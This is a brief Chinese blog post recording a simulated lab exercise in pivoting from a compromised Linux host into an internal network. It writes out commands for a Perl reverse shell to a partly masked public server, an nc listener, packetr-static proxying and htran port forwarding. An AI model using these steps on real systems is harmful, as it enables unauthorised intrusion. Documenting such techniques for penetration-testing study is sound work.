天天看點

Linux下的内網反彈執行個體

遇到一個案例,細節不表,把在案例中的操作方法在本機模拟了下,記錄之.

環境:

被攻陷的Linux主機(拿到root權限)-----模拟為我内網的一台Linux伺服器 192.168.0.105

hack的操作用機-----我的電腦 192.168.1.101

反彈到公網的伺服器-----我自己的公網伺服器 61.160.2xx.xxx

滲透測試用的windows測試機   192.168.1.109

工具:

packetr-static   Linux下的

htran.exe windows下的

sockcap 用作代理進入内網滲透的利器

過程:

1.我模拟下極度苛刻的情況下的環境,該攻陷的Linux伺服器對外不開放22,隻存在web端口80,那麼我們必須得反彈shell到公網的機器上,這點我虛拟機裡面沒 這個環境,我就直接說下簡要的

上傳back.pl檔案到linux下的tmp目錄下,執行

perl /tmp/back.pl xxx.xxx.xxx.xxx 端口

在公網的伺服器上,運作nc執行

nc -l -v -p 端口(跟上面的一樣)

現在我彈2個視窗回來,一個開代理,一個轉發資料

把packetr-static傳上去,執行

./packetr-static -s 1988

一個視窗轉發資料,執行

./packetr-static -slave 61.160.20x.xxx 123 127.0.0.1 1988

2.在windows公網端執行,

htran.exe -p -listen 123 1988

3.配置sockcap

4.運作代理程式進入内網

繼續閱讀